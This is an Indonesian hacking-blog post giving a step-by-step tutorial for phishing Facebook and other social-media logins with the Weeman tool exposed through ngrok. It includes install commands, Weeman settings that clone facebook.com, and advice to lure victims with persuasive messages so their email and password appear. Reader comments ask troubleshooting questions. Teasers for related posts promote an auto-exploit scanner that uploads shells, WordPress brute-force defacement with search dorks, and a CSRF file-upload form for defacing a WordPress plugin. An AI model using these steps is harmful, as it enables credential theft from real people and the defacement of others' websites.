Skip to main content

Hack Akun Facebook Dengan Weeman (phising)

Image
By

squadcyber.org - Weeman adalah penyedia layanan server berbasis cli yang bisa di gunakan untuk menjalankan web phising sosial media seperti Facebook, Instagram, dll.

Karena Weeman ketika di jalankan akan otomatis berjalan pada localhost, maka dari itu kita harus melakukan port fordwadding dengan menggunakan ngrok.

Sebelum nya kalian terlebih dahulu menginstall bahan-bahannya yaitu Weeman dan Ngrok nya

Cara Install Weeman

$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ git clone https://github.com/samyoyo/weeman
$ cd weeman
$ pip2 install bs4
$ pip2 install beautifulsoup
$ cd ..

Setelah kita install Weeman nya, kita lanjut ke install ngrok nya untuk port forwadding

Cara Install Ngrok

$ apt install wget
$ mkdir ngrok
$ cd ngrok
$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
$ unzip ngrok-stable-linux-arm.zip

Setelah kita install Ngrok nya, buka https://ngrok.com dan daftarkan akun ngrok untuk meng aktifkannya, lalu aktif kan ngrok kalian dengan mengetikkan kode token yang ada di akun ngrok kalian

Contoh :

Dan ngrok akan otomatis terbuka aktif dengan sendiri nya.

Cara Hack Akun Sosmed Dengan Phising

Setelah semua nya terinstall, langsung kita praktek kan cara menjalankan phising nya.

Buka aplikasi Termux nya dan masuk ke folder ngrok dengan mengetik

$ cd ngrok

Dan jalankan ngrok nya dengan mengetik

$ ./ngrok http 8080

Lalu nanti akan muncul seperti ini
Jika sudah berjalan ngrok nya, kita buka weeman di tab kedua dengan menggeser layar dari kanan ke kiri, lalu ketikkan kode di bawah ini

$ cd weeman
$ python2 weeman.py

Dan akan muncul seperti ini
Setelah weeman nya terbuka, kita ketikkan kode di bawah ini

(weeman ) : set url https://facebook.com
(weeman ) : set action_url https://facebook.com
(weeman ) : run

Lalu kita kembali buka tab ngrok nya, dan kita salin url seperti di gambar di bawah ini
Contoh nya : https://a8bef2d4.ngrok.io

Lalu kita sebarkan link tersebut ke korban dengan menggunakan kata kata yang manis untuk memancing korban agar membuka link tersebut.

Jika telah sukses merayu korban agar mau login di link tersebut, maka akan muncul email dan password korban seperti gambar di bawah ini
Demikian lah tutor Cara Hack Akun Sosial Media Metode Phising Dengan Weeman.

Jangan lupa gabung di channel telegram kita http://t.me/btnts

Thk to Mr.Cakil
Labels:

Comments

  1. wahyup11 March 2018 at 06:59

    Segmentation fault..
    Gimana mas?

    ReplyDelete
  2. Unknown20 March 2018 at 07:47

    Cara upgrade pip gimana ya mas?

    ReplyDelete
  3. Anonymous5 October 2018 at 23:19

    sangat bermanfaat mas!!!. mas memang ganteng bingitzzzzz.
    by: Shinichi_gans_14

    ReplyDelete
  4. Anonymous11 November 2018 at 21:23

    Gam buat aktifin ngroknya gmna?, connetnya dengan token, tokennya tak pencet gak bisa conec

    ReplyDelete

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

By
squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...
5 comments
Read more

Deface Wordpress Bruteforce dengan WPScan

By
squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...
Post a Comment
Read more

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

By
www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...
Post a Comment
Read more